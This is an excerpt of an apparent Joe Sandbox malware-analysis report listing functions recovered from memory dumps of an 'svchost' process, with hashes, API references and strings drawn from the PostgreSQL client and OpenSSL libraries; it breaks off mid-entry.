                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: abort
                                                                                            • String ID: A
                                                                                            • API String ID: 4206212132-3554254475
                                                                                            • Opcode ID: cc3049037457acc8c7fce60de4365968d393392804b6219ad68f81f4101c4349
                                                                                            • Instruction ID: 0b8bb495434735308b67a349bf07383e5f120c4627f23e42e7402b650fce39ab
                                                                                            • Opcode Fuzzy Hash: cc3049037457acc8c7fce60de4365968d393392804b6219ad68f81f4101c4349
                                                                                            • Instruction Fuzzy Hash: 4E11DF12A6E1558BE211DBF81C9039EEE50CB8336CB806B33E95807684CBA9CD8A8601
                                                                                            Function 00007FFDA36E54D0 Relevance: 28.8, APIs: 1, Strings: 18, Instructions: 297COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00007FFDA36EBF90: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36EBFA8
                                                                                              • Part of subcall function 00007FFDA36EBF90: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36EBFE0
                                                                                              • Part of subcall function 00007FFDA36EBF90: realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36EC079
                                                                                            • atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,?,?,?,?,?,show password_encryption,0000000800282019,?,00007FFDA36E4CE3), ref: 00007FFDA36E5635
                                                                                              • Part of subcall function 00007FFDA36EC210: memcpy.VCRUNTIME140(?,?,?,00007FFDA36D14F3), ref: 00007FFDA36EC252
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$atoimemcpyrealloc
                                                                                            • String ID: at character %s$%s$%s, $%s: $%s: $%s:%s$COLUMN NAME: %s$CONSTRAINT NAME: %s$CONTEXT: %s$DATATYPE NAME: %s$DETAIL: %s$HINT: %s$LOCATION: $QUERY: %s$SCHEMA NAME: %s$TABLE NAME: %s$no error message available$out of memory
                                                                                            • API String ID: 2504634096-1868357448
                                                                                            • Opcode ID: 6442449a5889c5902a691c08a288958c2d56ab7a17f59190937a26c3f0c437bb
                                                                                            • Instruction ID: efbb66e293317a44cf4abb2217e8c0e4a390e76a18cce5c048d3664a110c0c3f
                                                                                            • Opcode Fuzzy Hash: 6442449a5889c5902a691c08a288958c2d56ab7a17f59190937a26c3f0c437bb
                                                                                            • Instruction Fuzzy Hash: DCB16F10B4F65745FD54AA52A9713BA12935F46BC0F2C6035DE0D2BBDBEE2FE40A8348
                                                                                            Function 66011F78 Relevance: 28.6, APIs: 19, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: abort
                                                                                            • String ID:
                                                                                            • API String ID: 4206212132-0
                                                                                            • Opcode ID: 23102bc263e5e77f3b14829779a009aa3b4c0558342c76755987f36c74aeb397
                                                                                            • Instruction ID: c560aa4b0286726218898c0f564d76fb74659f165ed1c152a9ff8babe05b652e
                                                                                            • Opcode Fuzzy Hash: 23102bc263e5e77f3b14829779a009aa3b4c0558342c76755987f36c74aeb397
                                                                                            • Instruction Fuzzy Hash: 52F0F3519AE45A9B9510B3F84CA93AEEF109F9732CBD07F73E52C832909F9CCD155121
                                                                                            Function 00007FFDA36D4218 Relevance: 28.3, APIs: 6, Strings: 10, Instructions: 322stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$freelibintl_dgettextmemsetstrtol
                                                                                            • String ID: 28P01$57P03$expected authentication request from server, but received %c$invalid port number: "%s"$password retrieved from file "%s"$received invalid authentication request$received invalid error message$received invalid protocol negotiation message$server is not in hot standby mode$session is not read-only
                                                                                            • API String ID: 3302279146-2634374696
                                                                                            • Opcode ID: b2dfe49b34d677d3c29ed195cf4bd817914b4874c9a2d14e591925b781bee3a2
                                                                                            • Instruction ID: 1d6ddbb45b3fa4f247a52bfecfa709882e1877607b8ce906de4e44c52ecd5e9d
                                                                                            • Opcode Fuzzy Hash: b2dfe49b34d677d3c29ed195cf4bd817914b4874c9a2d14e591925b781bee3a2
                                                                                            • Instruction Fuzzy Hash: DEF1B523B0AA8286F752CF25C0617B827A2EF41B84F5C6035DA4D5778ADF3EE944C718
                                                                                            Function 00007FFDA36E2370 Relevance: 28.3, APIs: 10, Strings: 6, Instructions: 258networkCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errnomemcpy$ErrorLastlibintl_dgettextrealloc
                                                                                            • String ID: %s() failed: %s$cannot allocate memory for input buffer$connection not open$invalid socket$select$server closed the connection unexpectedlyThis probably means the server terminated abnormallybefore or while processing the request.
                                                                                            • API String ID: 2572778661-195360840
                                                                                            • Opcode ID: 683736e225a0484b0e8a7b908ca4e21e0da3be9cceff152e3ea7f260e115fc93
                                                                                            • Instruction ID: 6e4c0efeaa1eb0a3f07e825ceabc0dad4e70cae46883900b0d7e89f6bd45bd90
                                                                                            • Opcode Fuzzy Hash: 683736e225a0484b0e8a7b908ca4e21e0da3be9cceff152e3ea7f260e115fc93
                                                                                            • Instruction Fuzzy Hash: 63C1E672B0A78286FB619F24E4643B823A7EB44B44F2C6135D91D5738ADF3EE0458714
                                                                                            Function 00007FFDA36DA250 Relevance: 28.2, APIs: 9, Strings: 7, Instructions: 231stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00007FFDA36F46F0: strstr.VCRUNTIME140(?,?,00000000,00007FFDA36DA2A2), ref: 00007FFDA36F473E
                                                                                              • Part of subcall function 00007FFDA36F46F0: strchr.VCRUNTIME140(?,?,00000000,00007FFDA36DA2A2), ref: 00007FFDA36F476F
                                                                                              • Part of subcall function 00007FFDA36F46F0: strchr.VCRUNTIME140(?,?,00000000,00007FFDA36DA2A2), ref: 00007FFDA36F478A
                                                                                              • Part of subcall function 00007FFDA36F46F0: strchr.VCRUNTIME140(?,?,00000000,00007FFDA36DA2A2), ref: 00007FFDA36F47A3
                                                                                            • fgets.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFDA36DA2DB
                                                                                            • isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36DA33F
                                                                                            • isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36DA366
                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36DA3B4
                                                                                            • fgets.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFDA36DA534
                                                                                            • fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFDA36DA581
                                                                                              • Part of subcall function 00007FFDA36E2CD0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00007FFDA36D1C16,?,?,?,?,00007FFDA36D1CA5), ref: 00007FFDA36E2CE8
                                                                                              • Part of subcall function 00007FFDA36E2CD0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2D10
                                                                                              • Part of subcall function 00007FFDA36E2CD0: libintl_dgettext.LIBINTL-9 ref: 00007FFDA36E2D31
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: strchr$_errnofgetsisspace$fcloselibintl_dgettextstrncmpstrstr
                                                                                            • String ID: ldap$line %d too long in service file "%s"$nested service specifications not supported in service file "%s", line %d$out of memory$service$service file "%s" not found$syntax error in service file "%s", line %d
                                                                                            • API String ID: 778619447-2385001604
                                                                                            • Opcode ID: c11a0dcc67e5daa4ceced3dc4c3845162573d83c8acb8d6d04be37b7ecb065c6
                                                                                            • Instruction ID: 8b5f6e419f019de6453e3ed329728ee39a9b050be773650faf831bc3bf795ac0
                                                                                            • Opcode Fuzzy Hash: c11a0dcc67e5daa4ceced3dc4c3845162573d83c8acb8d6d04be37b7ecb065c6
                                                                                            • Instruction Fuzzy Hash: BA91B012B0FB8641FA618B15E43027927A2AF46BD4F4C6235CE6E677D3DE2EE5058318
                                                                                            Function 00007FFDA366F3D0 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 161COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: R_new$i2d_$L_sk_numR_set_debugX509_$L_sk_valueO_zalloc
                                                                                            • String ID: ssl\statem\extensions_clnt.c$tls_construct_ctos_status_request
                                                                                            • API String ID: 622043022-2755818124
                                                                                            • Opcode ID: 2c06f7c23f30e9df08e97f9bc69625d356fa9eeae623a73366c167eac32ac3de
                                                                                            • Instruction ID: fbac78deb569b30d966e24f8b54a83e8ef6eb3d01096a9b206fa1a97e76fcc94
                                                                                            • Opcode Fuzzy Hash: 2c06f7c23f30e9df08e97f9bc69625d356fa9eeae623a73366c167eac32ac3de
                                                                                            • Instruction Fuzzy Hash: BB517E65F0F24342F658A72194722F912539F8A7C0F4C6832DD0CABBD7DF2EE9568209
                                                                                            Function 66012730 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 136COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: abort
                                                                                            • String ID: B
                                                                                            • API String ID: 4206212132-1255198513
                                                                                            • Opcode ID: f7dd0cc482dba60a8c8a3f983b02cab4520f0e6043719a85abf665c3be207379
                                                                                            • Instruction ID: af839d126afc234641b54c59f780b880c5c28a3208696f70e3e69a81d6de6da9
                                                                                            • Opcode Fuzzy Hash: f7dd0cc482dba60a8c8a3f983b02cab4520f0e6043719a85abf665c3be207379
                                                                                            • Instruction Fuzzy Hash: 0D41D572A5D1549BE7108BF8C85439EEE91EB47348F819A33EA0987344DBBDCCC5C241
                                                                                            Function 00007FFDA36DA5C0 Relevance: 28.1, APIs: 6, Strings: 10, Instructions: 131COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: getenv$FolderPathmemset
                                                                                            • String ID: %s/%s$%s/pg_service.conf$%s/postgresql$.pg_service.conf$/etc$PGSERVICE$PGSERVICEFILE$PGSYSCONFDIR$definition of service "%s" not found$service
                                                                                            • API String ID: 334560960-118289201
                                                                                            • Opcode ID: 1ffb34a53ca5aac99b5c39ff3d643f82db0ade1e4b65ad68bf65780aea1ee9e9
                                                                                            • Instruction ID: 13161a3e99d889747002ab0e3a11010bbf73698230abbcb9f938b6d8ae306c2d
                                                                                            • Opcode Fuzzy Hash: 1ffb34a53ca5aac99b5c39ff3d643f82db0ade1e4b65ad68bf65780aea1ee9e9
                                                                                            • Instruction Fuzzy Hash: 1C518926B1FA8292FA60DB11E4642F563A2FF947C4F886031D94D63797DF2DD508C704
                                                                                            Function 00007FFDA36ECEE0 Relevance: 27.3, APIs: 18, Instructions: 290COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFDA36D1029), ref: 00007FFDA36ECF06
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strdup
                                                                                            • String ID:
                                                                                            • API String ID: 1169197092-0
                                                                                            • Opcode ID: 8c52b0339befd6388461b0677d47348cfde48d33bbb91dc0ea7d181672b9b7d0
                                                                                            • Instruction ID: be27a8d6352e8c577fabfaa82304f6a27de6aa2a0d2e187a70814119d976373b
                                                                                            • Opcode Fuzzy Hash: 8c52b0339befd6388461b0677d47348cfde48d33bbb91dc0ea7d181672b9b7d0
                                                                                            • Instruction Fuzzy Hash: 71C1B232B0A7428AFB109F14E42027977A2FB45B84F6C2535DA4D677A6DF3EE509C708
                                                                                            Function 66012000 Relevance: 27.1, APIs: 18, Instructions: 141COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5a706bcdd36c7d51db3d44c374c0ad4ce4307971269b878633400d05081ee730
                                                                                            • Instruction ID: f06384f9285f5b7e79687178b7fd98692edbe491189ca6bc9b542623afeff6e5
                                                                                            • Opcode Fuzzy Hash: 5a706bcdd36c7d51db3d44c374c0ad4ce4307971269b878633400d05081ee730
                                                                                            • Instruction Fuzzy Hash: 3F410356B5D1908BE722D7E8A86479EFE508B63388F805732DB2847381D6AFCCC5C302
                                                                                            Function 00007FFDA3619420 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 189COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: R_newR_set_debug$R_set_error
                                                                                            • String ID: SSL_key_update$expect_quic$expect_quic_conn_only$ossl_quic_key_update$ssl\quic\quic_impl.c$ssl\ssl_lib.c
                                                                                            • API String ID: 3782669924-366322674
                                                                                            • Opcode ID: 25564e96d79a5e9f1770ff2002ba25e1bd2f4b674b2891871583d58af0c08a6a
                                                                                            • Instruction ID: 6492a20c1b9fb014e9ca57aa7e6373147bb45ea5e76b67ccdaa97f77777e1ba8
                                                                                            • Opcode Fuzzy Hash: 25564e96d79a5e9f1770ff2002ba25e1bd2f4b674b2891871583d58af0c08a6a
                                                                                            • Instruction Fuzzy Hash: 6281B331F1A64282F750DB15E5602BA67A2EF84784F4C2032EA4D63B9BDF3EE545C748
                                                                                            Function 66012EC0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 180COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: J
                                                                                            • API String ID: 0-1141589763
                                                                                            • Opcode ID: 0463199d8df6325186edb301e50d86457bf96c0d8572e77fa7021b894f976d1e
                                                                                            • Instruction ID: a3642c809f243b7e8ba70b20e08a28e4e552c514d35e4c63fde919a868b7f8ea
                                                                                            • Opcode Fuzzy Hash: 0463199d8df6325186edb301e50d86457bf96c0d8572e77fa7021b894f976d1e
                                                                                            • Instruction Fuzzy Hash: 58414753F5D2904AE7278BE8A86076DFE80875B79CF844636DE68077C4D26ACDC9C702
                                                                                            Function 00007FFDA36DEAF0 Relevance: 25.7, APIs: 9, Strings: 8, Instructions: 208stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,show password_encryption,0000000800282019,00007FFDA36E70D9,?,?,?,?,?,?,show password_encryption,00007FFDA36E4D17), ref: 00007FFDA36DEB68
                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,show password_encryption,0000000800282019,00007FFDA36E70D9,?,?,?,?,?,?,show password_encryption,00007FFDA36E4D17), ref: 00007FFDA36DEB92
                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,show password_encryption,0000000800282019,00007FFDA36E70D9,?,?,?,?,?,?,show password_encryption,00007FFDA36E4D17), ref: 00007FFDA36DEC09
                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,show password_encryption,0000000800282019,00007FFDA36E70D9,?,?,?,?,?,?,show password_encryption,00007FFDA36E4D17), ref: 00007FFDA36DEC43
                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,show password_encryption,0000000800282019,00007FFDA36E70D9,?,?,?,?,?,?,show password_encryption,00007FFDA36E4D17), ref: 00007FFDA36DEC88
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: strcmp$freemalloc
                                                                                            • String ID: %d.%d.%d$client_encoding$default_transaction_read_only$in_hot_standby$scram_iterations$server_version$show password_encryption$standard_conforming_strings
                                                                                            • API String ID: 2782048367-1971756575
                                                                                            • Opcode ID: bedd025669a3e4b1c374ede9de9ed8628e210072b9c61d520807a82ff4abf9de
                                                                                            • Instruction ID: 483c8de9890fdf1f37062ee4fa5df87c3c370ce90a7178d80540abf234552eac
                                                                                            • Opcode Fuzzy Hash: bedd025669a3e4b1c374ede9de9ed8628e210072b9c61d520807a82ff4abf9de
                                                                                            • Instruction Fuzzy Hash: EE91E763B0FB9286FB548F2595701BD3BA2EB117C4F086139DA5E573D6DE2EE5008708
                                                                                            Function 00007FFDA36E3EB0 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 233COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
